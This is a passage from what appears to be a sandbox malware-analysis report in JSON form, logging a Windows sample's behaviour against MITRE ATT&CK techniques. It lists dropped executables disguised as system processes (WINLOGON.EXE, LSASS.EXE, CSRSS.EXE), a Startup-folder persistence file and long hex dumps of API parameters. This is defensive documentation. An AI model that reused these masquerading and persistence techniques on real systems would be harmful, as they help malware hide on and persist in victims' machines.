Menu\\Programs\\Startup\\Empty.pif\"\n \"019179afe76c122e3fa55ec27b73f6c56d923557814f2af0cb0e1c3db41f74f6.exe\" touched file \"C:\\Users\\%OSUSER%\\Local Settings\\Application Data\\WINDOWS\\WINLOGON.EXE\"\n \"019179afe76c122e3fa55ec27b73f6c56d923557814f2af0cb0e1c3db41f74f6.exe\" touched file \"C:\\Users\\%OSUSER%\\AppData\\Local\\Application Data\\WINDOWS\\WINLOGON.EXE\"\n \"019179afe76c122e3fa55ec27b73f6c56d923557814f2af0cb0e1c3db41f74f6.exe\" touched file \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\WINLOGON.EXE\"\n \"019179afe76c122e3fa55ec27b73f6c56d923557814f2af0cb0e1c3db41f74f6.exe\" touched file \"C:\\Users\\%OSUSER%\\Local Settings\\Application Data\\WINDOWS\\CSRSS.EXE\"\n \"019179afe76c122e3fa55ec27b73f6c56d923557814f2af0cb0e1c3db41f74f6.exe\" touched file \"C:\\Users\\%OSUSER%\\AppData\\Local\\Application Data\\WINDOWS\\CSRSS.EXE\"\n \"019179afe76c122e3fa55ec27b73f6c56d923557814f2af0cb0e1c3db41f74f6.exe\" touched file \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\CSRSS.EXE\"\n \"019179afe76c122e3fa55ec27b73f6c56d923557814f2af0cb0e1c3db41f74f6.exe\" touched file \"C:\\Users\\%OSUSER%\\Local Settings\\Application Data\\WINDOWS\\SERVICES.EXE\"\n \"019179afe76c122e3fa55ec27b73f6c56d923557814f2af0cb0e1c3db41f74f6.exe\" touched file \"C:\\Users\\%OSUSER%\\AppData\\Local\\Application Data\\WINDOWS\\SERVICES.EXE\"\n \"019179afe76c122e3fa55ec27b73f6c56d923557814f2af0cb0e1c3db41f74f6.exe\" touched file \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\SERVICES.EXE\"", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-235", "type": 6, "relevance": 1, "name": "Queries basic information of the specified process", "description": "\"019179afe76c122e3fa55ec27b73f6c56d923557814f2af0cb0e1c3db41f74f6.exe\" queries basic process information of the \"C:\\Users\\HAPUBWS\\AppData\\Local\\lsass.exe\" (UID: 960)\n \"019179afe76c122e3fa55ec27b73f6c56d923557814f2af0cb0e1c3db41f74f6.exe\" queries basic process information of the \"C:\\Users\\HAPUBWS\\AppData\\Local\\services.exe\" (UID: 960)\n \"D3_08.exe\" queries basic process information of the \"C:\\share\" (UID: 5992)\n \"D3_08.exe\" queries basic process information of the \"C:\\Windows\\System32\\tzres.dll\" (UID: 5992)\n \"IExplorer.exe\" queries basic process information of the \"C:\\Users\\HAPUBWS\\AppData\\Local\\WINDOWS\\LSASS.EXE\" (UID: 1712)\n \"IExplorer.exe\" queries basic process information of the \"C:\\PuRn4m4.txt\" (UID: 1712)\n \"WINLOGON.EXE\" queries basic process information of the \"C:\\share\" (UID: 5792)\n \"WINLOGON.EXE\" queries basic process information of the \"C:\\Windows\\System32\\tzres.dll\" (UID: 5792)", "origin": "API Call", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "binary-0", "type": 8, "relevance": 3, "name": "Dropped files", "description": "\"services.exe\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\"- Location: [%LOCALAPPDATA%\\services.exe]- [targetUID: 00000000-00000960]\n \"D3_08.exe\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\"- Location: [C:\\D3_08.exe]- [targetUID: 00000000-00000960]\n \"shell.exe\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\"- Location: [%WINDIR%\\System32\\shell.exe]- [targetUID: 00000000-00000960]\n \"D3_08.exe\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\"- Location: [%WINDIR%\\D3_08.exe]- [targetUID: 00000000-00000960]\n \"Data HAPUBWS.exe\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\"- Location: [C:\\Data %OSUSER%.exe]- [targetUID: 00000000-00000960]\n \"Empty.pif\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\"- Location: [%ALLUSERSPROFILE%\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\Empty.pif]- [targetUID: 00000000-00000960]\n \"New Folder.exe\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\"- Location: [C:\\D3_08\\New Folder.exe]- [targetUID: 00000000-00000960]\n \"CSRSS .exe\" has type \"data\"- [targetUID: N/A]\n \"WINLOGON.EXE.bin\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\"- [targetUID: N/A]\n \"IEXPLORER.EXE.67EE4B9B.bin\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\"- [targetUID: N/A]\n \"CSRSS.EXE.bin\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\"- [targetUID: N/A]\n \"SERVICES.EXE\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\"- Location: [%LOCALAPPDATA%\\WINDOWS\\SERVICES.EXE]- [targetUID: 00000000-00000960]\n \"IEXPLORER.EXE.67EE4669.bin\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\"- [targetUID: N/A]\n \"SMSS.EXE\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\"- Location: [%LOCALAPPDATA%\\WINDOWS\\SMSS.EXE]- [targetUID: 00000000-00000960]\n \"LSASS.EXE\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\"- Location: [%LOCALAPPDATA%\\WINDOWS\\LSASS.EXE]- [targetUID: 00000000-00000960]\n \"MrD3_08.scr\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\"- Location: [%WINDIR%\\System32\\MrD3_08.scr]- [targetUID: 00000000-00000960]\n \"D3_08.EXE.67EE4A8B.bin\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\"- [targetUID: N/A]\n \"D3_08.EXE.67EE4667.bin\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\"- [targetUID: N/A]\n \"IEXPLORER.EXE.67EE4A8E.bin\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\"- [targetUID: N/A]\n \"PuRn4m4.txt\" has type \"ASCII text with CRLF line terminators\"- Location: [C:\\PuRn4m4.txt]- [targetUID: 00000000-00000960]\n \"desktop.ini\" has type \"Windows desktop.ini\"- Location: [C:\\desktop.ini]- [targetUID: 00000000-00000960]\n \"lsass.exe\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\"- Location: [%LOCALAPPDATA%\\lsass.exe]- [targetUID: 00000000-00000960]\n \"IExplorer.exe\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\"- Location: [%LOCALAPPDATA%\\IExplorer.exe]- [targetUID: 00000000-00000960]\n \"winlogon.exe\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\"- Location: [%LOCALAPPDATA%\\winlogon.exe]- [targetUID: 00000000-00000960]\n \"IExplorer.exe\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\"- Location: [%WINDIR%\\System32\\IExplorer.exe]- [targetUID: 00000000-00000960]\n \"smss.exe\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\"- Location: [%LOCALAPPDATA%\\smss.exe]- [targetUID: 00000000-00000960]\n \"D3_08.exe\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\"- Location: [%LOCALAPPDATA%\\D3_08.exe]- [targetUID: 00000000-00000960]\n \"csrss.exe\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\"- Location: [%LOCALAPPDATA%\\csrss.exe]- [targetUID: 00000000-00000960]\n \"LSASS.EXE\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\"- Location: [%LOCALAPPDATA%\\LSASS.EXE]- [targetUID: 00000000-00000960]\n \"SMSS.EXE\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\"- Location: [%LOCALAPPDATA%\\SMSS.EXE]- [targetUID: 00000000-00000960]\n \"SERVICES.EXE\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\"- Location: [%LOCALAPPDATA%\\SERVICES.EXE]- [targetUID: 00000000-00000960]\n \"WINLOGON.EXE\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\"- Location: [%LOCALAPPDATA%\\WINDOWS\\WINLOGON.EXE]- [targetUID: 00000000-00000960]\n \"WINLOGON.EXE\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\"- Location: [%LOCALAPPDATA%\\WINLOGON.EXE]- [targetUID: 00000000-00000960]\n \"CSRSS.EXE\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\"- Location: [%LOCALAPPDATA%\\CSRSS.EXE]- [targetUID: 00000000-00000960]\n \"CSRSS.EXE\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\"- Location: [%LOCALAPPDATA%\\WINDOWS\\CSRSS.EXE]- [targetUID: 00000000-00000960]\n \"D3_08.EXE.67EE4AE3.bin\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\"- [targetUID: N/A]", "origin": "Binary File", "attck_id": "T1105", "attck_id_wiki": "https://attack.mitre.org/techniques/T1105"}, {"threat_level_human": "informative", "category": "Anti-Detection/Stealthyness", "identifier": "api-139", "type": 6, "relevance": 3, "name": "Calls an API typically used to load a resource in memory", "description": "\"IExplorer.exe\" called \"LoadResource with parameter {'hModule': '4194304', 'hResInfo': '4337992'}\" (UID: 00000000-00001712)\n \"IExplorer.exe\" called \"LoadResource with parameter {'hModule': '4194304', 'hResInfo': '4338040'}\" (UID: 00000000-00001712)\n \"IExplorer.exe\" called \"LoadResource with parameter {'hModule': '4194304', 'hResInfo': '4338008'}\" (UID: 00000000-00001712)\n \"D3_08.exe\" called \"LoadResource with parameter {'hModule': '4194304', 'hResInfo': '4337992'}\" (UID: 00000000-00005496)\n \"D3_08.exe\" called \"LoadResource with parameter {'hModule': '4194304', 'hResInfo': '4338040'}\" (UID: 00000000-00005496)\n \"D3_08.exe\" called \"LoadResource with parameter {'hModule': '4194304', 'hResInfo': '4338008'}\" (UID: 00000000-00005496)\n \"IExplorer.exe\" called \"LoadResource with parameter {'hModule': '4194304', 'hResInfo': '4337992'}\" (UID: 00000000-00005836)\n \"IExplorer.exe\" called \"LoadResource with parameter {'hModule': '4194304', 'hResInfo': '4338040'}\" (UID: 00000000-00005836)\n \"IExplorer.exe\" called \"LoadResource with parameter {'hModule': '4194304', 'hResInfo': '4338008'}\" (UID: 00000000-00005836)\n \"D3_08.exe\" called \"LoadResource with parameter {'hModule': '4194304', 'hResInfo': '4337992'}\" (UID: 00000000-00005808)\n \"D3_08.exe\" called \"LoadResource with parameter {'hModule': '4194304', 'hResInfo': '4338040'}\" (UID: 00000000-00005808)\n \"D3_08.exe\" called \"LoadResource with parameter {'hModule': '4194304', 'hResInfo': '4338008'}\" (UID: 00000000-00005808)\n \"CSRSS.EXE\" called \"LoadResource with parameter {'hModule': '4194304', 'hResInfo': '4337992'}\" (UID: 00000000-00001440)\n \"CSRSS.EXE\" called \"LoadResource with parameter {'hModule': '4194304', 'hResInfo': '4338040'}\" (UID: 00000000-00001440)\n \"CSRSS.EXE\" called \"LoadResource with parameter {'hModule': '4194304', 'hResInfo': '4338008'}\" (UID: 00000000-00001440)\n \"CSRSS.EXE\" called \"LoadResource with parameter {'hModule': '4194304', 'hResInfo': '4337992'}\" (UID: 00000000-00005760)\n \"CSRSS.EXE\" called \"LoadResource with parameter {'hModule': '4194304', 'hResInfo': '4338040'}\" (UID: 00000000-00005760)\n \"CSRSS.EXE\" called \"LoadResource with parameter {'hModule': '4194304', 'hResInfo': '4338008'}\" (UID: 00000000-00005760)\n \"IExplorer.exe\" called \"LoadResource with parameter {'hModule': '4194304', 'hResInfo': '4337992'}\" (UID: 00000000-00004400)", "origin": "API Call", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-222", "type": 6, "relevance": 2, "name": "Calls an API typically used to retrieve OS information", "description": "\"019179afe76c122e3fa55ec27b73f6c56d923557814f2af0cb0e1c3db41f74f6.exe\" called \"GetVersionExA\" with parameter 9c0000000600000001000000b11d00000200000053657276696365205061636b2031000000000000000000000200000000000000d8ebbf76f8a424000070fd7f9a5c3a7700f0fd7f60c612004470fd7f00000000400000003f0000001f0000000070fd7f54c61200c15c3a77608241771f0000000070fd7f9a5c3a7700f0fd7f78c61200578939778083417713173f75d8ebbf76 (UID: 00000000-00000960)\n \"D3_08.exe\" called \"GetVersionExA\" with parameter 9c0000000600000001000000b11d00000200000053657276696365205061636b2031000000000000000000000200000000000000d8ebbf7688dc200000f0fd7f9a5c3a7700e0fd7f60c6120044f0fd7f00000000400000003f0000002000000000f0fd7f54c61200c15c3a77608241772000000000f0fd7f9a5c3a7700e0fd7f78c61200578939778083417713173f75d8ebbf76 (UID: 00000000-00005992)\n \"IExplorer.exe\" called \"GetVersionExA\" with parameter 940000000600000001000000b11d00000200000053657276696365205061636b203100775059397798010000a0010000d21bc301d01bc3010016c3010000c001e414c3018800000088000000176839779817c301ff2b3977b8fa7477a41bc301ac012a0000002a000000c001c06dc0011200a200fb040000c06dc0015016c301100000000000000013009d00fb040000c06dc001 (UID: 00000000-00001712)\n \"IExplorer.exe\" called \"GetVersionExA\" with parameter 9c0000000600000001000000b11d00000200000053657276696365205061636b2031000000000000000000000200000000000000d8ebbf76d0a02e0000b0fd7f9a5c3a7700f0fd7f60c6120044b0fd7f00000000400000003f0000002000000000b0fd7f54c61200c15c3a77608241772000000000b0fd7f9a5c3a7700f0fd7f78c61200578939778083417713173f75d8ebbf76 (UID: 00000000-00001712)\n \"D3_08.exe\" called \"GetVersionExA\" with parameter 940000000600000001000000b11d00000200000053657276696365205061636b203100775059397798010000a0010000d21bbe01d01bbe010016be010000bb01e414be018800000088000000176839779817be01ff2b397752fa7477a41bbe01ac012600000026000000bb01c06dbb011000ac0078030000c06dbb015016be0110000000000000001100a70078030000c06dbb01 (UID: 00000000-00005496)\n \"IExplorer.exe\" called \"GetVersionExA\" with parameter 940000000600000001000000b11d00000200000053657276696365205061636b203100775059397798010000a0010000d21b3701d01b37010016370100003401e414370188000000880000001768397798173701ff2b39770ef77477a41b3701ac0125000000250000003401c06d34011200a20090050000c06d340150163701100000000000000013009d0090050000c06d3401 (UID: 00000000-00005836)\n \"WINLOGON.EXE\" called \"GetVersionExA\" with parameter 940000000600000001000000b11d00000200000053657276696365205061636b203100775059397798010000a0010000d21bbb01d01bbb010016bb010000b801e414bb018800000088000000176839779817bb01ff2b39777de87477a41bbb01ac011700000017000000b801c06db80114001b005b010000c06db8015016bb011000000000000000150016005b010000c06db801 (UID: 00000000-00005792)\n \"WINLOGON.EXE\" called \"GetVersionExA\" with parameter 9c0000000600000001000000b11d00000200000053657276696365205061636b2031000000000000000000000200000000000000d8ebbf7620f21b000090fd7f9a5c3a7700f0fd7f60c612004490fd7f00000000400000003f000000200000000090fd7f54c61200c15c3a7760824177200000000090fd7f9a5c3a7700f0fd7f78c61200578939778083417713173f75d8ebbf76 (UID: 00000000-00005792)\n \"WINLOGON.EXE\" called \"GetVersionExA\" with parameter 940000000600000001000000b11d00000200000053657276696365205061636b203100775059397798010000a0010000d21b4c01d01b4c0100164c0100004901e4144c0188000000880000001768397798174c01ff2b39772ded7477a41b4c01ac012f0000002f0000004901c06d490113009d0059010000c06d490150164c0110000000000000001400980059010000c06d4901 (UID: 00000000-00005588)\n \"D3_08.exe\" called \"GetVersionExA\" with parameter 940000000600000001000000b11d00000200000053657276696365205061636b203100775059397798010000a00100005a1b5901581b590188155901000056016c14590188000000880000001768397720175901ff2b3977e2e374772c1b5901ac0120000000200000005601905b56011000ac003c040000905b5601d815590110000000000000001100a7003c040000905b5601 (UID: 00000000-00005808)\n \"CSRSS.EXE\" called \"GetVersionExA\" with parameter 940000000600000001000000b11d00000200000053657276696365205061636b203100775059397798010000a0010000d21b5901d01b59010016590100005601e414590188000000880000001768397798175901ff2b397747e57477a41b5901ac012c0000002c0000005601c06d56011200a20090050000c06d560150165901100000000000000013009d0090050000c06d5601 (UID: 00000000-00001440)\n \"CSRSS.EXE\" called \"GetVersionExA\" with parameter 940000000600000001000000b11d00000200000053657276696365205061636b203100775059397798010000a0010000d21bd101d01bd1010016d1010000ce01e414d1018800000088000000176839779817d101ff2b397757e57477a41bd101ac012200000022000000ce01c06dce011200a20090050000c06dce015016d101100000000000000013009d0090050000c06dce01 (UID: 00000000-00005760)\n \"CSRSS.EXE\" called \"GetVersionExA\" with parameter 9c0000000600000001000000b11d00000200000053657276696365205061636b2031000000000000000000000200000000000000d8ebbf76780127000060fd7f9a5c3a7700f0fd7f60c612004460fd7f00000000400000003f0000001f0000000060fd7f54c61200c15c3a77608241771f0000000060fd7f9a5c3a7700f0fd7f78c61200578939778083417713173f75d8ebbf76 (UID: 00000000-00005760)\n \"IExplorer.exe\" called \"GetVersionExA\" with parameter 940000000600000001000000b11d00000200000053657276696365205061636b203100775059397798010000a0010000d21bdb01d01bdb010016db010000d801e414db018800000088000000176839779817db01ff2b397764d87477a41bdb01ac013000000030000000d801c06dd8011200a2002d010000c06dd8015016db01100000000000000013009d002d010000c06dd801 (UID: 00000000-00004400)\n \"D3_08.exe\" called \"GetVersionExA\" with parameter 940000000600000001000000b11d00000200000053657276696365205061636b203100775059397798010000a00100005a1b5b01581b5b0188155b01000058016c145b0188000000880000001768397720175b01ff2b3977cbd174772c1b5b01ac0123000000230000005801905b58011000ac00fb040000905b5801d8155b0110000000000000001100a700fb040000905b5801 (UID: 00000000-00000756)\n \"SERVICES.EXE\" called \"GetVersionExA\" with parameter 940000000600000001000000b11d00000200000053657276696365205061636b203100775059397798010000a0010000d21b5001d01b50010016500100004d01e414500188000000880000001768397798175001ff2b397780d77477a41b5001ac012d0000002d0000004d01c06d4d0114009800b1020000c06d4d0150165001100000000000000015009300b1020000c06d4d01 (UID: 00000000-00003332)\n \"SERVICES.EXE\" called \"GetVersionExA\" with parameter 9c0000000600000001000000b11d00000200000053657276696365205061636b2031000000000000000000000200000000000000d8ebbf7628c1310000f0fd7f9a5c3a7700e0fd7f60c6120044f0fd7f00000000400000003f0000002000000000f0fd7f54c61200c15c3a77608241772000000000f0fd7f9a5c3a7700e0fd7f78c61200578939778083417713173f75d8ebbf76 (UID: 00000000-00003332)\n \"WINLOGON.EXE\" called \"GetVersionExA\" with parameter 940000000600000001000000b11d00000200000053657276696365205061636b2031000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000010004000000000000000000 (UID: 00000000-00000964)\n \"WINLOGON.EXE\" called \"GetVersionExA\" with parameter 940000000600000001000000b11d00000200000053657276696365205061636b203100775059397798010000a0010000d21bbc01d01bbc010016bc010000b901e414bc018800000088000000176839779817bc01ff2b3977dacf7477a41bbc01ac012a0000002a000000b901c06db90114009800b1020000c06db9015016bc01100000000000000015009300b1020000c06db901 (UID: 00000000-00000964)\n \"SERVICES.EXE\" called \"GetVersionExA\" with parameter 940000000600000001000000b11d00000200000053657276696365205061636b203100775059397798010000a0010000d21bba01d01bba010016ba010000b701e414ba018800000088000000176839779817ba01ff2b39776dce7477a41bba01ac011b0000001b000000b701c06db70113009d006d010000c06db7015016ba011000000000000000140098006d010000c06db701 (UID: 00000000-00005724)\n \"IExplorer.exe\" called \"GetVersionExA\" with parameter 940000000600000001000000b11d00000200000053657276696365205061636b203100775059397798010000a0010000d21b5501d01b55010016550100005201e414550188000000880000001768397798175501ff2b39771ec37477a41b5501ac012a0000002a0000005201c06d52011200a200ce040000c06d520150165501100000000000000013009d00ce040000c06d5201 (UID: 00000000-00004188)\n \"LSASS.EXE\" called \"GetVersionExA\" with parameter 940000000600000001000000b11d00000200000053657276696365205061636b203100775059397798010000a0010000d21bb101d01bb1010016b1010000ae01e414b1018800000088000000176839779817b101ff2b39772bc67477a41bb101ac012d0000002d000000ae01c06dae011400980061010000c06dae015016b10110000000000000001500930061010000c06dae01 (UID: 00000000-00004392)\n \"LSASS.EXE\" called \"GetVersionExA\" with parameter 9c0000000600000001000000b11d00000200000053657276696365205061636b2031000000000000000000000200000000000000d8ebbf76d0c631000090fd7f9a5c3a7700f0fd7f60c612004490fd7f00000000400000003f000000200000000090fd7f54c61200c15c3a7760824177200000000090fd7f9a5c3a7700f0fd7f78c61200578939778083417713173f75d8ebbf76 (UID: 00000000-00004392)\n \"CSRSS.EXE\" called \"GetVersionExA\" with parameter 940000000600000001000000b11d00000200000053657276696365205061636b203100775059397798010000a0010000d21bb401d01bb4010016b4010000b101e414b4018800000088000000176839779817b401ff2b3977b6bd7477a41bb401ac012d0000002d000000b101c06db1011200a20059010000c06db1015016b401100000000000000013009d0059010000c06db101 (UID: 00000000-00006052)\n \"WINLOGON.EXE\" called \"GetVersionExA\" with parameter 940000000600000001000000b11d00000200000053657276696365205061636b203100775059397798010000a0010000d21b6700d01b67000016670000006400e414670088000000880000001768397798176700ff2b397725b47477a41b6700ac0119000000190000006400c06d6400140098001d000000c06d6400501667001000000000000000150093001d000000c06d6400 (UID: 00000000-00004308)", "origin": "API Call", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-125", "type": 6, "relevance": 3, "name": "Calls an API typically used to get system version information", "description": "\"019179afe76c122e3fa55ec27b73f6c56d923557814f2af0cb0e1c3db41f74f6.exe\" called \"RtlGetVersion\" with parameter 140100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b0020003100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 (UID: 00000000-00000960)\n \"019179afe76c122e3fa55ec27b73f6c56d923557814f2af0cb0e1c3db41f74f6.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b00200031000000000088b1220068da1200b3445f6c81d09f75000000000000000000000000000000000000000000000000140100000000000000000000000000000ee8c77529a8c67524df12005ecb9d751401000000000000005d9b7580e112000e5d9b7518dd1200dcaa9f75010000000000000072000000ffffffffffffffffa0da1200780200000000000025000000a0da12007b00370035003800340037003100370037002d0046003000370037002d0034003100370031002d0042004400320043002d004100360042004200320031003600f9e8c775f8da12006d826375a47a230004010000 (UID: 00000000-00000960)\n \"019179afe76c122e3fa55ec27b73f6c56d923557814f2af0cb0e1c3db41f74f6.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b0020003100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 (UID: 00000000-00000960)\n \"019179afe76c122e3fa55ec27b73f6c56d923557814f2af0cb0e1c3db41f74f6.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b00200031000000320065003300660061003500350065006300320037006200370033006600360063003500360064003900320033003500350037003800310034006600320061006600300063006200300065003100630033006400620034003100660037003400660036002e00650078006500000000000000000000000000000000000000000000000000000000000000ff2b3977c42d7477d8ebbf76ac011f0000001f00000000000000000026003e000c00000000000000000000000000000000000000270039000c000000000000000000000038701f0000000000200000000000000000000000 (UID: 00000000-00000960)\n \"019179afe76c122e3fa55ec27b73f6c56d923557814f2af0cb0e1c3db41f74f6.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b00200031000000240001000000ffffffff020000000800000000ba240000ba2400fbb924000000000002000000b88f210000000000010000080000000068ec120095e135774cfa5f00feffffffe0d912003f08b37602000000b88f2100000000000100001888fbb276d0d91200c81c9f75a6db120095fbb27604db1200b88f21000000000000000000000000008cda120000001f007b00370035003800340037003100370037002d0046003000370037002d0034003100370031002d0042004400320043002d0041003600420042003200310036000de8c7754cda12006d826375a47a230004010000 (UID: 00000000-00000960)\n \"019179afe76c122e3fa55ec27b73f6c56d923557814f2af0cb0e1c3db41f74f6.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b00200031000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000007b00370035003800340037003100370037002d0046003000370037002d0034003100370031002d0042004400320043002d00410036004200420032003100360065e1c77564d312006d8263753465240004010000 (UID: 00000000-00000960)\n \"019179afe76c122e3fa55ec27b73f6c56d923557814f2af0cb0e1c3db41f74f6.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b002000310000000000b8d32400b8cf1200b3445f6c81d09f7500000000000000000000000000000000000000000000000038010000000000000000000000000000defdc77559bdc67574d412005ecb9d753801000000000000005d9b75d0d612000e5d9b7568d21200dcaa9f7501000000000000007a000000fffffffffffffffff0cf1200780200000000000025000000f0cf12007b00370035003800340037003100370037002d0046003000370037002d0034003100370031002d0042004400320043002d00410036004200420032003100360009e2c77548d012006d826375fc6a240004010000 (UID: 00000000-00000960)\n \"019179afe76c122e3fa55ec27b73f6c56d923557814f2af0cb0e1c3db41f74f6.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b002000310000002400e017000000001f0000000040106d2400accf12000464397738011f00e063397702000000b88f210000000000010000084cfa5f00feffffffbcc74177c0c741770a00000030cf12003f08b37602000000b88f2100000000000100001888fbb27620cf1200c81c9f75f6d0120095fbb27654d01200b88f2100000000000000000000000000dccf120000001f007b00370035003800340037003100370037002d0046003000370037002d0034003100370031002d0042004400320043002d0041003600420042003200310036005dfdc7759ccf12006d826375fc6a240004010000 (UID: 00000000-00000960)\n \"019179afe76c122e3fa55ec27b73f6c56d923557814f2af0cb0e1c3db41f74f6.exe\" called \"RtlGetVersion\" with parameter 140100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b002000310000002400a86a2400a36a2400000000000000000000001f0000000001e4cb12000000000048d9120095e135774cfa5f00feffffff435c397750593977aa000000b8000000a26a2400a06a24006ccd1200a4d112000000000000000000000000000000000000000000000000006019000000001f001c5c387760d83e75ffffffff170000001ccd120024000000030000000cd2120038d71200a4d112008600000048cd120096ed3977ca6a2400a06a0f75860000006ccd1200a4d112000000000086008800a06a0f756ccd1200916c0f75ca6a2400a06a0f75a06a0f75dcd1120002020000 (UID: 00000000-00000960)\n \"019179afe76c122e3fa55ec27b73f6c56d923557814f2af0cb0e1c3db41f74f6.exe\" called \"RtlGetVersion\" with parameter 000000000600000001000000b11d000002000000530065007200760069006300650020005000610063006b0020003100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 (UID: 00000000-00000960)\n \"D3_08.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b00200031000000000060501f0068da1200b3445f6c81d09f7500000000000000000000000000000000000000000000000018010000000000000000000000000000e885d775dd7ac67524df12005ecb9d751801000000000000005d9b7580e112000e5d9b7518dd1200dcaa9f75010000000000000072000000ffffffffffffffffa0da1200780200000000000025000000a0da12007b00370035003800340037003100370037002d0046003000370037002d0034003100370031002d0042004400320043002d0041003600420042003200310036008f85d775f8da12006d8263757c521f0004010000 (UID: 00000000-00005992)\n \"D3_08.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b0020003100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 (UID: 00000000-00005992)\n \"D3_08.exe\" called \"RtlGetVersion\" with parameter 140100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b0020003100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 (UID: 00000000-00005992)", "origin": "API Call", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-147", "type": 6, "relevance": 3, "name": "Calls an API typically used to retrieve local language", "description": "\"IExplorer.exe\" called \"GetLocaleInfoW\" with parameter \"1033\" - (UID: 00000000-00001712)\n \"D3_08.exe\" called \"GetLocaleInfoW\" with parameter \"1033\" - (UID: 00000000-00005496)\n \"IExplorer.exe\" called \"GetLocaleInfoW\" with parameter \"1033\" - (UID: 00000000-00005836)\n \"D3_08.exe\" called \"GetLocaleInfoW\" with parameter \"1033\" - (UID: 00000000-00005808)\n \"CSRSS.EXE\" called 